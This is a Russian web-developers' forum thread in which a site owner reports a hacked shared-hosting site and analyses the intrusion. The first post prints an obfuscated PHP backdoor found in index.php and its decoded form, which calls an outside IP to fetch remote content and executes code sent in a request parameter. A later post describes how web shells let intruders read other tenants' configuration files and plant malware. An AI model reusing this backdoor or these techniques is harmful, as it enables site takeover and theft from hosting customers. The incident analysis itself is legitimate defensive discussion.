Взломали хостинг

Разговоры обо всем

Взломали хостинг

Сообщение guyasyou » 05 июл 2015, 13:28 ,  »  Сообщение:#1

Получил письмо от Рег.ру, что он нашел php скрипт странный.
Глянул- файл-менегер, выглядит так
Изображение

в access.log видно, что юзал его кто-то из украины
Код: Выделить всё
91.220.151.33 - - [04/Jul/2015:13:01:33 +0300] "POST /js/member-5.php HTTP/1.0" 200 12478 "http://craftplay.ru/js/member-5.php" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.17"

IP диапазон: 91.220.151.0 - 91.220.151.255
Название провайдера: FOP Krapko Olexandr Muhaylovich

На этой странице была ссылка на сайт эксплойтов:
Пожалуйста зарегистрируйтесь, чтобы увидеть ссылку
, там есть и
Пожалуйста зарегистрируйтесь, чтобы увидеть ссылку

По логам FTP никаких подключений не было. Видимо вскрыли через C5

В Index.php находил такое
Код: Выделить всё
//###=i=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLc ... vLlWqXGftsK0="));'));
//###=i=###

Мой dr.web реагирует на него как на BackDoor

Расшифровываем:
Код: Выделить всё
if (isset($ibv)) {
   echo $ibv;
} else {
   if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
   
   if(!isset($c_["HTTP_ACCEPT_CHARSET"])){
      if(preg_match("!.!u",file_get_contents($_SERVER["SCRIPT_FILENAME"]))){
         $c0="UTF-8";
      }else{
         $c0="windows-1251";
      }
   }else{
      $c0=$c_["HTTP_ACCEPT_CHARSET"];
   }
   
   if(function_exists("curl_init")){
      $c1=curl_init("http://109.236.81.101/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("5901ac288e42519524e863ffc803aa04".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
      curl_setopt($c1,42,false);curl_setopt($c1,19913,true);
      $ibv = curl_exec($c1);
      curl_close($c1);
      
   }elseif(ini_get("allow_url_fopen")==1){
      $ibv = file_get_contents("http://109.236.81.101/get.php?d=".urlencode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"])."&u=".urlencode($_SERVER["HTTP_USER_AGENT"])."&c=".$c0."&i=1&ip=".$_SERVER["REMOTE_ADDR"]."&h=".md5("5901ac288e42519524e863ffc803aa04".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"].$_SERVER["HTTP_USER_AGENT"].$c0."1"));
   }

   if (isset($ibv)) {
      echo $ibv;
   }
   
   if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "8bfdcec8") {
      @assert($_REQUEST["c"]);
   }
}




На мои запросы их сервер никак не отвечает.
ИМХО: это рекламная вставка, которая перекроет сайт рекламой, или отображает рекламу для мобильных устройств
www.pure-web.ru - fullstack разработка сайтов и веб-приложений
Аватара пользователя
guyasyou
Администратор
 
Сообщения: 558
Зарегистрирован: 05 янв 2012, 12:29
Откуда: Новосибирск

Re: Взломали хостинг

Сообщение cmsservice » 06 июл 2015, 10:34 ,  »  Сообщение:#2

А хостинг VPS или обычный виртуальный?

Мы потестили эксплойты опубликованные на сайте, ни один не сработал, кроме DoS. Один из способов избежать действия части эксплойтов - использоваться русские имена областей на страницах.
С уважением, Константин
http://Переделка-сайтов.РФ
Индивидуальные решения на платформе Concrete5 для театров и производственно-торговых компаний.
Аватара пользователя
cmsservice
 
Сообщения: 763
Зарегистрирован: 10 окт 2010, 00:10
Откуда: Москва

Re: Взломали хостинг

Сообщение guyasyou » 06 июл 2015, 11:16 ,  »  Сообщение:#3

Обычная виртуалка
Кста, есть подозрение что через фтп залили скрипт. Так как залили на сайт без cms, там было несколько аккаутов фпт на его папку, может что утекло. Логи только за неделю, саппорт не может подтвердить.
www.pure-web.ru - fullstack разработка сайтов и веб-приложений
Аватара пользователя
guyasyou
Администратор
 
Сообщения: 558
Зарегистрирован: 05 янв 2012, 12:29
Откуда: Новосибирск

Re: Взломали хостинг

Сообщение cmsservice » 06 июл 2015, 11:23 ,  »  Сообщение:#4

guyasyou писал(а):Кста, есть подозрение что через фтп залили скрипт.

Да легко, може троян на компе у кого-то украл пароли от ftp.
С уважением, Константин
http://Переделка-сайтов.РФ
Индивидуальные решения на платформе Concrete5 для театров и производственно-торговых компаний.
Аватара пользователя
cmsservice
 
Сообщения: 763
Зарегистрирован: 10 окт 2010, 00:10
Откуда: Москва

Re: Взломали хостинг

Сообщение vbnm » 07 июл 2015, 23:24 ,  »  Сообщение:#5

У меня так ломали на бесплатных хостах,- причем сами хостеры, когда забывал вставлять их рекламу на страницу)))
vbnm
 
Сообщения: 461
Зарегистрирован: 02 июл 2011, 01:44

Re: Взломали хостинг

Сообщение Count_Raven » 13 июл 2015, 12:16 ,  »  Сообщение:#6

vbnm писал(а):У меня так ломали на бесплатных хостах,- причем сами хостеры, когда забывал вставлять их рекламу на страницу)))

Зачем хостерам самих себя ломать? У них прямой доступ есть, им ломать не надо.
Country Amiant - Regno All Rianto
Аватара пользователя
Count_Raven
Супермодератор
 
Сообщения: 1156
Зарегистрирован: 06 окт 2010, 15:00
Откуда: Country Amiant

Re: Взломали хостинг

Сообщение Count_Raven » 13 июл 2015, 12:27 ,  »  Сообщение:#7

guyasyou писал(а):Глянул - файл-менегер, выглядит так...

Это не file manager, это security shell. У него намного больше возможностей, чем у обычного менеджера файлов.
Они довольно разные бывают. Позволяют выполнять SQL-команды, искать и проверять системные файлы сервера, искать скрипты с SUID которые небезопасные, чтобы можно было с правами администратора зловред свой выполнить, позволяют загружать и выполнять exploits, смотреть информацию о системе, выполнять shell-команды, редактировать файлы, распаковывать и создавать архивы и т.д. и т.п. - зависит от самого шелла и от того, что разрешает делать сервер.
Находишь какую-либо дырку, чтобы залить через неё shell, а потом продолжаешь ковырять сервер.

Бывает весело на шэред-хостинге. Выходишь из дира своего аккаунта выше, где находятся директории других аккаунтов, которые с тобой делят этот сервер и если есть возможность, то можно там пошариться, посканить. Там бывает права на файлы конфигурации CMS да и вообще на разные скрипты установлены в 777. Т. е. можно и прочитать - посмотреть пароли/явки =) и даже отредактировать и записать туда какой-нибудь шпион/зловред.
Country Amiant - Regno All Rianto
Аватара пользователя
Count_Raven
Супермодератор
 
Сообщения: 1156
Зарегистрирован: 06 окт 2010, 15:00
Откуда: Country Amiant


Вернуться в Флейм

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2

cron